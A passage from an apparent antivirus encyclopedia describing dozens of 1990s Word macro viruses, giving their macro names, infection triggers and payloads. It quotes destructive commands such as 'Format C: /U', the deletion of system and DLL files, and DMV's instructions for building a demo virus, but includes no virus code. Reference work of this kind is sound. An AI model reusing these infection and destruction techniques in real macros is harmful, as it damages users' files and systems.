" (good, bad, or indifferent). " [WORD_DMV.B (a.k.a. Waverly)] Virus name: WORD_DMV.B (a.k.a. Waverly) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 1249 Bytes Place of origin: Australia Date of origin: 1006 Payload: Yes Seen In-The-Wild: No Description: DMV.B infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed (AutoClose). If the second field is higher than 45 and the month is October or later, DMV.B adds the following text at the end of the active document: " We are citizens of Australia. " " We are youth of Victoria. " " We are victims of Mount Waverley Secondary College. " " We tolerated your discipline. " " We stomached your abuse. " " We bore your unprofessionalism. " " We toed the line to protect the bullshit image of YOUR school. " " We watched our friends be pressured out of your school, " " just so you could keep your fucking pass rate figures up. " " And now the world will see, through the spread of this virus " just how TOTALLY FUCKED UP we are! " " Parents: yeah- go ahead send your kids to a school where about half " of us use drugs. You won't see those figures in the glossy brochure." " This community announcement was proudly sponsored by: " " M.W.S.C. Year 12 Class Of '96. - in YOUR face. " [WORD_DMV.C] Virus name: WORD_DMV.C Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoClose Size of macros: 2990 Bytes Place of origin: Unknown Date of origin: Unknown Destructive: No Seen In-The-Wild: No Description: The difference between this new variant and the original DMV.A virus is that some of the virus codes have been reformatted and some parts are missing (e-mail address). DMV.C infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. The following messages are displayed when the global template becomes infected: " Counting global macros " " Infected NORMAL.DOT with copy of AutoClose macro virus " " Macro vir. has been spread. Now execute some other code. " When a new document becomes infected (global template is already infected), DMV displays the following message: " AutoClose macro vir. is already installed in NORMAL.DOT " " Saved current document as template. " " Infected current .doc with copy of AutoClose macro vir. " " Macro vir. has been spread. Now execute some other code. " The virus code contains the following message at the top of the code: " REM This demonstrates an application-specific document virus " " REM generated by an automatic macro in Microsoft Word for " " REM Windows 6.0. Code is executed each time a document is closed." " REM This macro is only a demonstration, and does not perform any " " REM destructive actions. " " REM The purpose of this code is to reveal a significant security " " REM risk in software that supports macro languages with " " REM auto-loading capabilities. Current virus detection tools are" " REM not presently capable of detecting this type of virus, and " " REM most users are blissfully unaware that threats can come from " " REM documents. " " REM Paste this code in the macro Window of a Word document " " REM template. Save the macro as AutoClose. Enter some random " " REM text in the main word processing window and save the document." " REM Now copy the file, naming the new file VIRUS.DOC. Open " " REM VIRUS.DOC in Word. It will appear as a normal document, but " " REM when you close the document, the virus will execute. " " REM Message boxes display progress as the code is executed. " " REM Code is commented. " " REM Joel McNamara, December 17, 1994 " [WORD_Doggie.A] Virus name: WORD_Doggie.A Virus Type: Word macro virus Number of macros: 3 Encrypted: No Macro names: AutoOpen, Doggie, FileSaveAs Size of macros: 610 Bytes Place of origin: USA Date of origin: Summer 1996 Destructive: No Common In-The-Wild: No Description: Doggie infects the global template (normal.dot) when an infected document is opened. Further documents become infected with the "FileSaveAs" command. Doggie is one of the very few non-destructive macro viruses. It only infects other files and displays the following message: " Doggie " [WORD_Drugs.A:De] Virus name: WORD_Drugs.A:De Virus Type: Word macro virus Number of macros: 9 Encrypted: Yes Macro names: AutoOpen, Dateidrucken, DateidruckenStandard, DateiSpeichern, DateiSpeichernUnter, DateiSchliessen, DokumentSchliessen, DateiDokVorlagen, ExtrasMakro Size of macros: 8013 Bytes Place of origin: Germany Date of origin: March 1997 Destructive: Yes Seen In-The-Wild: No Description: Drugs infects the global template when an infected document is opened (AutoOpen). Drugs uses language specific commands, therefore it only works with the German version of Microsoft Word. It uses "ExtrasMakro" and hides DokumentVorlagen to make recognition of an infected document more difficult (called macro stealth technique). Drugs contains several destructive payloads. 1. It deletes all *.DLL files in the following directory: C:\WINDOWS\SYSTEM 2. It replaces words in documents that are printed: "und" replaced with "oder" "da▀" with "das" "nΣmlich" with "nΣhmlich" 3. It inserts page breaks. [WORD_Dub.A] Virus name: WORD_Dub.A Virus Type: Word macro virus Number of macros: 13 Encrypted: Yes Macro names: AutoExec, NewDocInsert, ToolsMacro, FileTemplates FileSaveAs, FcDub, AeDub, Annhilator, Message SearchDestroyer, ExeKiller, KillIt (FileClose) Size of macros: 22669 Bytes in Documents 25325 Bytes in global template Place of origin: Baku, Azerbaijan Date of origin: Spring 1997 Destructive: Yes Seen In-The-Wild: No Description: When Dub becomes active, it searches the C:\ drive for documents (C:\*.DOC). It infects all documents that have the Word 6/7 format. After each infection, Dub writes a log file where it mentions all the killed documents (existing text is replaced with "666"). Dub.A uses "ToolsMacro" and "FileTemplates" to make recognition of an infected document more difficult (called macro stealth technique). We advise not to access the two menu items, because it will result in the execution of Dubs viral code. Dub contains various payloads: 1. When an infected document is saved (FileSaveAs) at 4:00 o'clock, Dub displays the following message: " Do you believe in Satan? " 2. When Microsoft Word is started (AutoExec) on the 13th of each month, Dub tries to delete the following files: *.EXE. 3. Upon infection, all existing text is replaced with " 666 ". [WORD_Dzt.A] Virus name: WORD_Dzt.A Virus Type: Word macro virus Alias: WORD_Dzutaq Number of Variants: 6 Number of macros: 2 Encrypted: Yes Macro names: AutoOpen (FileSave), FileSaveAs Size of macros: 2033 Bytes Place of origin: Indonesia Date of origin: April 1996 Destructive: No Common In-The-Wild: Yes Description: Dzt.A activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSave" and "FileSaveAs" commands. When infecting a document, Dzt.A adds the following text to the Comments section of File|Properties: " DZT " [WORD_Dzutaq] Virus name: WORD_Dzutaq Virus Type: Word macro virus Alias: WORD_Dzt.A Number of Variants: 6 Number of macros: 2 Encrypted: Yes Macro names: AutoOpen (FileSave), FileSaveAs Size of macros: 2033 Bytes Place of origin: Indonesia Date of origin: April 1996 Destructive: No Common In-The-Wild: Yes Description: Dzutaq activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSave" and "FileSaveAs" commands. When infecting a document, Dzutaq adds the following text to the Comments section of File|Properties: " DZT " [WORD_Dzt.B] Virus name: WORD_Dzt.B Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen (FileSave) Size of macros: 1214 Bytes Place of origin: Indonesia Date of origin: April 1996 Destructive: No Common In-The-Wild: Yes Description: Dzt.B activates when an infected document is opened (AutoOpen). Further documents become infected when they are saved with the "FileSave" command. The main difference between this new variant and the original Dzt.A virus is that the "FileSaveAs" macro is missing. [WORD_Dzt.C] Virus name: WORD_Dzt.C Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: FileSaveAs Size of macros: 819 Bytes Place of origin: Indonesia Date of origin: April 1996 Destructive: No Common In-The-Wild: Yes Description: The main difference between this new variant and the original Dzt.A virus is that the "AutoOpen" macro is missing. Dzt.C was most likely created by an older version of a popular anti-virus product. The disinfection routine was faulty and forgot to remove the "AutoOpen" macro. [WORD_Dzt.D] Virus name: WORD_Dzt.D Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen (FileSave), FileSaveAs Size of macros: 2584 Bytes Place of origin: Indonesia Date of origin: April 1996 Destructive: No Common In-The-Wild: No Description: The main difference between this new variant and the original Dzt.A virus is that the comment in the File|Properties section was changed from "DZT" to "DZT'96." The "FileSaveAs" macro is also partially corrupted. For more information, please refer to the Dzt.A virus description. [WORD_Easy.A (a.k.a. EasyMan)] Virus name: WORD_Easy.A (a.k.a. EasyMan) Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 1090 Bytes Place of origin: Austria Date of origin: September 1996 Destructive: Yes Common In-The-Wild: No Description: Easy activates when an infected document is opened (AutoOpen). If the "AutoOpen" macro already exists in the global template, Easy does not infect. The following text will be inserted at the top of an opened document at a random date and with a random color: " It's Easy Man " After that Easy displays the following text at the status bar: " WORD_EasyMan, written by Spooky " [WORD_Epidemic.A] Virus name: WORD_Epidemic.A Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, AutoExec Size of macros: 38746 Bytes Place of origin: Taiwan Date of origin: January 1997 Destructive: Yes Common In-The-Wild: No Description: When an infected document is opened, Epidemic infects the global template (normal.dot). Further documents become infected when they are opened (AutoOpen) or Microsoft Word is started (AutoExec). Epidemic has various destructive payloads: 1. On April 27, Epidemic formats the hard disk (similar to FormatC). 2. On June 17, it uses DEBUG.EXE to drop the Dos-based virus "Natas" into the C:\MOUSE.COM file. It also modifies C:\AUTOEXEC.BAT to call C:\MOUSE.COM upon the next boot-up. 3. On October 10, it deletes the following files: " C:\IO.SYS " " C:\MSDOS.SYS " " C:\COMMAND.COM " This action will leave the computer unbootable. It then displays the following message: " EPIDEMIC Macro Virus V1.1 " Epidemic only works with the Chinese version of Microsoft Word. [WORD_Trojan.FormatC (a.k.a. TrojanFormat)] Virus name: WORD_Trojan.FormatC (a.k.a. TrojanFormat) Virus Type: Word macro virus Number of macros: 1 Encrypted: No Macro names: AutoOpen Size of macros: 81 Bytes Place of origin: Posted to Usenet Date of origin: Unknown Destructive: Yes Common In-The-Wild: No Description: FormatC is not a virus but a trojan horse, which does not replicate. When an infected document is opened, the trojan triggers the destructive payload, which types " Format C: /U " in a minimized DOS box and then formats the C drive. FormatC is very unlikely to spread since it does not infect other files. [WORD_Friendly.A:De] Virus name: WORD_Friendly.A:De Virus Type: Word macro virus Number of macros: 20 Encrypted: No Macro names: Abbrechen, AutoExec, AutoOpen, Cancel, DateiBeenden, DateiNeu, DateiOeffnen, DateiSchliessen, DateiSpeichern, DateiSpeichernUnter, ExtrasMacro, ExtrasMakro, Fast, FileExit, FileNew, FileOpen, FileSave, FileSaveAs, Infizieren, Talk Size of macros: 9867 Bytes Place of origin: Germany Date of origin: May 1996 Destructive: Yes Common In-The-Wild: No Description: Friendly was an effort to write a virus for more than one language, yet due to some wrong translations (ExtrasMacro instead of ToolsMacro) Friendly does not work with other versions than the German version of Microsoft WORD_ Friendly tries to infect the global template (normal.dot) when an infected document is opened. It checks the global template for a previous infection by looking for the text "Friendly", Author = Nightmare". After the macros have been transferred the destructive payload is called from the "Fast" macro. Friendly infects other documents whenever new ones are created, an action is canceled, and whenever documents are opened, closed, saved, or exited from Word. Friendly does not check for a previous document infection. It simply overwrites existing macros. The destructive payload, inside the "Fast" macro, is called when the system clock has a second value smaller than 2. Friendly then creates a debug script inside the C:\DOS directory and executes the DOS DEBUG.EXE command. In addition, Friendly adds an entry into AUTOEXEC.BAT, so the DOS based virus is started after the next boot-up. The DOS based virus inside Friendly has a size of 395 Bytes and is a memory resident companion virus encrypted with CryptCOM. Friendly displays the following message on January 1: " Ein gutes neues Jahr ! " and infects EXE files upon execution. COM files are created with the same name as EXE files and with the attributes "READ-ONLY" and "HIDDEN." If the virus is active, the following text is displayed when users try to display the macro list: "You can't do that!" "I'm very anxious!" "Hello my friend!" "<< Friends >> Virus" (translated:) "Du kannst das nicht tun!" "Ich bin sehr aengstlich!" "Hallo mein Freund!" "<< Friends >> Virus" After May 1, Friendly displays the following text when infecting documents for the first time (except for NORMAL.DOT). "Hallo mein Freund!" "Ich bin der << Friends >> Virus und wie heißt du?" "Gib doch bitte anschließend unten deinen Namen ein:" "Also ..... ich habe eine gute und eine schlechte Nachricht fuer dich!" "Die schlechte Nachricht ist, daß ich mich auf deiner Platte eingenistet" "habe und die gute ist, daß ich aber ein freundlicher und auch nuetzlicher" "Virus bin. Druecke bitte OK fuer Weiter!" "Wenn du mich nicht killst, dann fuege ich ein Programm in deine" "Autoexec.bat ein, daß deine lame Tastatur etwas auf Touren bringt." "Also ...., gib dir einen Ruck und kill mich nicht. Goodbye!" (translated:) "Hello my Friend!" "I'm the << Friends >> Virus and how are you?" "Can you give me your name, please?" "Hello .... I have a good and a bad message for you! The bad message is that" "you have now a Virus on your Harddisk and the good message is that I'm" "harmless and useful. Press OK!" "If you don't kill me, I will insert a programme in your AutoExec.bat thats" "your Keyboard accelerated. Please .... don't kill me. Goodbye!" The entered name will then be displayed. [WORD_Fury.A (a.k.a. Greenfury)] Virus name: WORD_Fury.A (a.k.a. Greenfury) Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: GreenFury, GGGFFF (FileSalvaConNome), FFFGGG, AutoOpen Size of macros: 2322 Place of origin: Unknown Date of origin: Unknown Destructive: Yes Seen In-The-Wild: No Description: Fury is another virus that only works with the Italian version of Microsoft Word. Fury infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are saved with the "FileSalvaConNome --> translated: FileSaveAs" command. When Fury is loaded from a non-Italian Word version, it deletes all files in the current directory. Fury also sets a random password to the active document. [WORD_FutureNot.A (a.k.a. Anti-IVX, Future)] Virus name: WORD_FutureNot.A (a.k.a. Anti-IVX, Future) Virus Type: Word macro virus Number of macros: 1 or 2 (in global template) Encrypted: No Macro names: AutoOpen (FileSaveAs) Size of macros: Polymorphic Place of origin: Unknown Date of origin: 1997 Destructive: No Common In-The-Wild: No Description: FutureNot is the first polymorphic macro virus. When an infected document is opened, FutureNot infects the global template. It creates two macros in the global template. One is always "FileSaveAs" and the second one is a copy of "AutoOpen" with a randomly chosen name. While the second macro remains the same, the FileSaveAs macro changes due to randomly selected comments. FutureNot also modifies the C:\AUTOEXEC.BAT file. It adds the following comment at the end of the file: " @ATTRIB -R C:\MSOFFICE\WINWORD\TEMPLATE\NORMAL.DOT > NUL " This clears the Read-Only attribute from the global template. [WORD_Gangsterz.A (a.k.a Big Daddy Cool, Daddy)] Virus name: WORD_Gangsterz.A (a.k.a Big Daddy Cool, Daddy) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: Gangsterz, Paradise Size of macros: 4250 Bytes Place of origin: Germany Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Gangsterz uses a new triggering mechanism. Instead of using automatic macros (AutoOpen, etc.) or redefining built-in Word commands, it uses assigned keys to start up its macros. The "Gangsterz" macro is associated with pressing space and the "Paradise" macro with pressing "e." If a user presses any of the two keys while working on an infected document, the associated macros are activated. If a document is infected on January 1, a new document is created with the following text: " Big_Daddy_Cool virus generated by NJ " and then filled with scrolling O's. If the value of the XOP setting in the [intl] section of win.ini is not set to "Installed", Gangsterz drops an intended batch file (XOP.bat) virus after activation. It adds a line to the C:\AUTOEXEC.BAT file to start the virus. [WORD_Goldfish.A (a.k.a Fishfood)] Virus name: WORD_Goldfish.A (a.k.a Fishfood) Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoOpen, AutoClose Size of macros: 9867 Bytes Place of origin: USA Date of origin: July 1996 Destructive: No Common In-The-Wild: No Description: Goldfish infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are also opened ("AutoOpen"). Goldfish is one of the very few non-destructive macro viruses. It only infects other files and displays the following message: " I am the goldfish, I am hungry, feed me. " The message will not go away until the user types in an acceptable response. Available answers are: "fishfood" "worms" "worm" "pryme" "core" [WORD_GoodNight.A] Virus name: WORD_GoodNight.A Virus Type: Word macro virus Number of macros: 10 Encrypted: No Macro names: Exit, AutoExec, AutoExit, AutoOpen, FileOpen, FileSave, AutoClose, FileClose FileSaveAs, FileCloseAll Size of macros: 4992 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: Yes Description: GoodNight.A infects the global template (normal.dot) when an infected document is opened. Further documents become infected when they are closed (AutoClose, FileClose, AutoExit, and FileCloseAll) or saved (FileSave and FileSaveAs). When GoodNight triggers, it tries to exit Microsoft WORD_ GoodNight.A devolves into GoodNight.A1 (9 macros with 4431 Bytes) and then into GoodNight.A2 (6 macros with 2763 Bytes). GoodNight.A2 is not capable of spreading any further, it does not infect any other documents. [WORD_Haggis.A] Virus name: WORD_Haggis.A Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen Size of macros: 300 Bytes Place of origin: Unknown Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Haggis infects the global template when an infected document is opened. Further documents become infected when they are also opened (AutoOpen). Haggis removes "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). When Haggis triggers, it sets the password " Haggis " to the active document. If you find a document with an unknown password, please download a copy of WinWord Password Recovery Tool (wwprt). It is available at: www.vdsarg.com. [WORD_Hassle.a (a.k.a Bogus)] Virus name: WORD_Hassle.a (a.k.a Bogus) Virus Type: Word macro virus Number of macros: 7 Encrypted: Yes Macro names: AutoClose, Toolsmacro, Microsoft01, Microsoft02, Microsoft03, Microsoft04, Microsoft05 Size of macros: 8283 Bytes Place of origin: USA Date of origin: August 1996 Destructive: No Common In-The-Wild: No Description: Hassle is another virus that uses the macro "ToolsMacro" to make recognition of an infected document more difficult (called macro stealth technique). If the user selects any command, it will show the following message and close Microsoft Word: " Out of Memory or System Resources " Hassle is one of the very few non-destructive macro viruses. It only infects other files and displays the following text window: " Are you sure to Quit? " This only happens seldomly, with a 5% probability. Another payload asks the user to register a software with Microsoft. Hassle will only accept: "Bill Gates", "Microsoft" and "666" Whenever the user selects the Tools/Macro command, Hassle will display the following text at the bottom of the screen: " Microsoft Word Assistant Version 6.2 " [WORD_Hellga.A (a.k.a DNZ, Hellgate)] Virus name: WORD_Hellga.A (a.k.a DNZ, Hellgate) Virus Type: Word macro virus Number of macros: 10 Encrypted: Yes Macro names: AutoClose, DnZ, EditCut, EditCopy, FileNew, FileExit, FileTemplates, ToolsSpelling, ToolsMacro, ToolsCustomize Size of macros: 2498 Bytes Place of origin: Unknown Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Hellga infects whenever the "DnZ" macro is called from one of the virus macros. It then infects the global template (normal.dot) and further documents. Hellga also adds the setting "Program= Installed" to the [Demo] section of win.ini (Windows directory). The following message is displayed on March 9 of each year: " WM.DnZ " " Written by Bill_HellGateS " [WORD_Helper.A] Virus name: WORD_Helper.A Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 409 Bytes Place of origin: Unknown Date of origin: Unknown Payload: Yes Seen In-The-Wild: Yes Description: Helper infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. When a document is closed on the 10th of each month, Helper triggers its destructive payload. It sets the following password to the saved document: " help " [WORD_Helper.B] Virus name: WORD_Helper.B Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 409 Bytes Place of origin: Unknown Date of origin: 1997 Payload: No Seen In-The-Wild: Yes Description: Helper.B infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. The main difference between this new variant and the original Helper.A virus is that the payload routine has been modified. Due to a mistake, Helper.B does not save any documents with the "help" passWORD_ [WORD_Helper.C] Virus name: WORD_Helper.C Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 410 Bytes Place of origin: Europe Date of origin: April 1997 Payload: No Seen In-The-Wild: No Description: Helper.C infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. The main difference between this new variant and the original Helper virus is that someone tried to change the trigger date and the password. Helper.C does not trigger its payload since one important change in its code is missing. [WORD_Helper.D] Virus name: WORD_Helper.D Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 412 Bytes Place of origin: Europe Date of origin: April 1997 Payload: No Seen In-The-Wild: No Description: Helper.D infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. The main difference between this new variant and the original Helper virus is that someone tried to change the trigger date and the password. Helper.D does not trigger its payload since one important change in its code is missing. [WORD_Helper.E] Virus name: WORD_Helper.E Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoClose Size of macros: 416 Bytes Place of origin: Europe Date of origin: April 1997 Payload: No Seen In-The-Wild: No Description: Helper.E infects the global template (normal.dot) when an infected document is closed. Further documents become infected when they are also closed. The main difference between this new variant and the original Helper virus is that someone tried to change the trigger date and the password. Helper.E does not trigger its payload since one important change in its code is missing. [WORD_Hiac.A] Virus name: WORD_Hiac.A Virus Type: Word macro virus Number of macros: 2 Encrypted: Yes Macro names: AutoClose, HI (AC) Size of macros: 576 Bytes Place of origin: Australia Date of origin: Spring 1997 Destructive: No Common In-The-Wild: Yes Description: Hiac.A is another "do nothing" virus that does nothing else besides infecting other files. Infection occurs when a user closes a document (AutoClose). Its code is faulty and the template bit of infected documents is not set, therefore it is unlikely to spread its code to other files. [WORD_Hot.A] Virus name: WORD_Hot.A Virus Type: Word macro virus Number of macros: 4 Encrypted: Yes Macro names: AutoOpen, DrawBringInFrOut, InsertPBreak, ToolsRepaginat, FileSaveAs, StartOfDoc Size of macros: 5515 Bytes Place of origin: Unknown Date of origin: January 1996 Destructive: Yes Common In-The-Wild: Yes Description: When an infected document is opened the virus is activated by the AutoOpen macro. Some replicated Hot samples also display the following error message: " Unable to load the specified library " Hot turns off the prompting of Word to ensure a hidden infection of the global template (normal.dot). It also checks the file "WINWORD6.INI" for the following entry: "QLHot". If not present, Hot records a "hot date", 14 days in the future. If this variable is not already set, the global template becomes infected. The InsertPBreak/InsertPageBreak inserts a page-break into the current document. However, it is also used by the virus to determine whether or not a document is already infected. Some of the macros are renamed when they are copied by the WordBasic "MacroCopy" command: "AutoOpen" becomes "StartOfDoc" "DrawBringInFrOut" becomes "AutoOpen" "InsertPBreak" becomes "InsertPageBreak" "ToolsRepaginat" becomes "FileSave" In addition, the global template contains the following macros: "FileSave" (similar to "ToolsRepaginat") "StartOfDoc" (similar to "AutoOpen") Hot also uses special functions from the Windows file "KERNEL.EXE" (Win API). It uses the API to find the path to Windows and to open files with simple functions. It should be noted that many other options were available to the virus author. The destructive payload, which is reached upon arrival of the hot date" set under the "QLHot" section in the WINWORD6.ini file, deletes text from the current active document. This payload is bypassed if the file EGA5.CPI is present in the "C:\DOS" directory. A comment in the virus source code suggests that this is a "feature" designed to protect the virus author and his friends. [WORD_Hunter.A:De (a.k.a. Headhunter V 3.0)] Virus name: WORD_Hunter.A:De (a.k.a. Headhunter V 3.0) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, DateiNeu, ExtrasMakro Size of macros: 1051 Bytes Place of origin: Germany Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: Hunter.A does not infect the global template. It saves an infected document to the Word STARTUP directory (WINWORD.DOT), which is used to infect new documents when they are created (DateiNeu - translated: FileNew). Hunter.A uses "ExtrasMakro" to make recognition of an infected document more difficult (called macro stealth technique). When Hunter.A triggers (probability of 1/60), it displays the following message: " One - You lock the target " " Two - You bait the line " " Three - You slowly spread the net " " And Four - You catch the man " Hunter.A uses language specific macros, therefore it only works with the German version of Microsoft Word. [WORD_Hunter.B:De (aka Headhunter V 3.1)] Virus name: WORD_Hunter.B:De (aka Headhunter V 3.1) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, DateiNeu, ExtrasMakro Size of macros: 1126 Bytes Place of origin: Germany Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: The main difference between this new variant and the previous Hunter.A virus is that Hunter.B contains some modified codes. Hunter.B does not infect the global template. It saves an infected document to the Word STARTUP directory (WINWORD_DOT), which is used to infect new documents when they are created (DateiNeu - translated: FileNew). Hunter.B uses "ExtrasMakro" to make recognition of an infected document more difficult (called macro stealth technique). When Hunter.B triggers (probability of 1/60), it displays the following message: " One - You lock the target " " Two - You bait the line " " Three - You slowly spread the net " " And Four - You catch the man " Hunter.B uses language specific macros, therefore it only works with the German version of Microsoft Word. [WORD_Hunter.C:De (aka Headhunter V 3.5)] Virus name: WORD_Hunter.C:De (aka Headhunter V 3.5) Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, DateiNeu, ExtrasMakro Size of macros: Polymorphic Place of origin: Germany Date of origin: Spring 1997 Payload: Yes Seen In-The-Wild: No Description: The main difference between this new variant and previous Hunter viruses is that Hunter.C adds text to its macros, therefore making it a polymorphic virus. Hunter.C uses the same "ExtrasMakro" from variant A and B to make recognition of an infected document more difficult (called macro stealth technique). Hunter.C uses language specific macros, therefore it only works with the German version of Microsoft Word. [WORD_Hybrid.A] Virus name: WORD_Hybrid.A Virus Type: Word macro virus Alias: WORD_Achtung Number of Variants: 8 Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 2815 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Common In-The-Wild: Yes Description: As the name suggests, the Hybrid virus is a combination of a virus with a macro anti-virus solution. Its "AutoClose" macro has been snatched from a well-known, yet ineffective, anti-virus solution called ScanProt (written by Microsoft). Hybrid activates when an infected document in opened. Further documents become infected when they are saved with the "FileSaveAs" command. Hybrid has been found In-the-Wild and can be detected/disinfected with any better anti-virus solution. [WORD_Achtung] Virus name: WORD_Achtung Virus Type: Word macro virus Alias: WORD_Hybrid.A Number of Variants: 8 Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 2815 Bytes Place of origin: Unknown Date of origin: January 1997 Destructive: No Common In-The-Wild: Yes Description: The Achtung virus is a combination of a virus and a macro anti- virus solution. Its "AutoClose" macro has been snatched from a well-known, yet ineffective, anti-virus solution called ScanProt (written by Microsoft). Achtung activates when an infected document in opened. Further documents become infected when they are saved with the "FileSaveAs" command. Achtung has been found In-the-Wild and can be detected/ disinfected with any better anti-virus solution. [WORD_Hybrid.B] Virus name: WORD_Hybrid.B Virus Type: Word macro virus Number of macros: 1 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 2815 Bytes Place of origin: Unknown Date of origin: February 1997 Destructive: No Common In-The-Wild: No Description: Hybrid.B is a new variant based on the original Hybrid.A virus. The only difference between the two viruses is that the "AutoClose" macro, snatched from the anti-virus macro solution ScanProt, is corrupted. Due to this corruption Microsoft Word displays a WordBasic error message whenever a document is closed. "Unknown Command, Subroutine or Function" For additional information, please refer to the Hybrid.A virus description. [WORD_Hybrid.C] Virus name: WORD_Hybrid.C Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: AutoOpen, AutoClose, FileSaveAs Size of macros: 2815 Bytes Place of origin: Unknown Date of origin: Spring 1997 Destructive: No Common In-The-Wild: No Description: Hybrid.C is a new variant based on the original Hybrid.A virus. The only difference between the two viruses is that the "AutoClose" macro, snatched from the anti-virus macro solution ScanProt, is corrupted. Due to this corruption Microsoft Word displays the following error message when a user tries to close a file: " syntax error " For additional information, please refer to the Hybrid.A virus description. [WORD_Imposter.A] Virus name: WORD_Imposter.A Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoClose, DMV (FileSaveAs) Size of macros: 907 Bytes Place of origin: England Date of origin: March 1996 Destructive: No Common In-The-Wild: Yes Description: Imposter infects the global template (normal.dot) when an infected document is closed and the macros "DMV" and "FileSaveAs" do not exist. When Imposter.A copies the "DMV" macro, it renames it to "FileSaveAs" and displays the following message: " DMV " Further documents become infected when the "FileSaveAs" command is used. The following text can be found inside Imposter.A, but is not displayed: " just to prove another point " This text is based on the Concept virus, which has "this is enough to prove my point" in its virus code. [WORD_Imposter.B] Virus name: WORD_Imposter.B Virus Type: Word macro virus Number of macros: 2 Encrypted: No Macro names: AutoClose, DMV (FileSaveAs) Size of macros: 907 Bytes Place of origin: England Date of origin: March 1996 Destructive: No Common In-The-Wild: No Description: The only difference between this new variant and the original Imposter virus is the spelling of the comment in the virus code. Please refer to Imposter.A for more information. [WORD_Irish.A] Virus name: WORD_Irish.A Virus Type: Word macro virus Number of macros: 4 Encrypted: No Macro names: AutoOpen, WordHelp, AntiVirus, WordHelpNT Size of macros: 4152 Bytes Place of origin: USA Date of origin: Spring 1996 Destructive: No Common In-The-Wild: No Description: Irish infects the global template (normal.dot) when an infected document is opened. Further documents become infected when the "FileSave" command is used. Two of the macros, "WordHelp" and "WordHelpNT", do not run automatically. However, when executed manually by the user, they will change the Windows desktop color to green. The macro "WordHelpNT" contains a payload which attempts to activate the screen saver and display the following message: " Happy Saint Patties Day " However the payload seems to be faulty and does not work under Windows 95 (Irish only exists in Microsoft Word). [WORD_Italian.A] Virus name: WORD_Italian.A Virus Type: Word macro virus Number of macros: 3 Encrypted: Yes Macro names: FileMacro, FileChiudi, FileEsci, FileSalva, WordMacro1, WordMacro2 Size of macros: 1438 Bytes Place of origin: Italy Date of origin: January 1996 Destructive: No Seen In-The-Wild: No Description: Italian is the first functional virus written for the Italian version of Microsoft Word. When an infected document is opened on the 7th, 13th, 17th or 31st of each month it displays the following message: " Your PC is infected by " " WORD_Macro.ITALIAN Virus " " Written Jan,1996. " [WORD_Johnny.A(GoJohnny)] Virus name: WORD_Johnny.A (GoJohnny) Virus Type: Word macro virus Number of macros: 5 or 6 Encrypted: Yes, 4/5 or 5/6 Macro names: Presentv, AutoOpen, Presentw, FileSaveAs. Presentz, FileSave, vGojohnny Size of macros: 3393 Bytes in .doc files 4955 Bytes in global template Place of origin: Unknown Date of origin: Unknown Payload: Yes Seen In-The-Wild: No Description: Johnny infects the global template (normal.dot) when an infected file is opened. Further documents become infected when they are saved with the "FileSave" or "FileSaveAs" command. When Johhny triggers it creates a new document with the following text: " NAIPESVOH REHM " After that it puts the following message on the status bar: " Starting Autosave " To make recognition of an infection more difficult, Johnny turns off the prompting of Word before it infects the global template. [WORD_Johnny.B] Virus name: WORD_Johnny.B Virus Type: Word macro virus Number of macros: 5 (or 6) Encrypted: Yes Macro names: AutoOpen, Presentv, Presentw, Presentz, vGoJohnny Size of macros: 3992 Bytes Place of origin: UK Date of origin: January 1997 Payload: Yes Common In-The-Wild: No Description: The difference between this new variant and the original Johnny.A virus is that Johnny.B is now able to infect the French version of Microsoft Word. The following 2 macros are changed: "FichierEnregistre" instead of "FileSave" and "FichierEnregistreSous" instead of "FileSaveAs". For more information, please refer to the Johnny.A virus description. [WORD_Kerrang.A] Virus name: WORD_Kerrang.A Virus Type: Word macro virus Number of macros: 5 Encrypted: Yes Macro names: 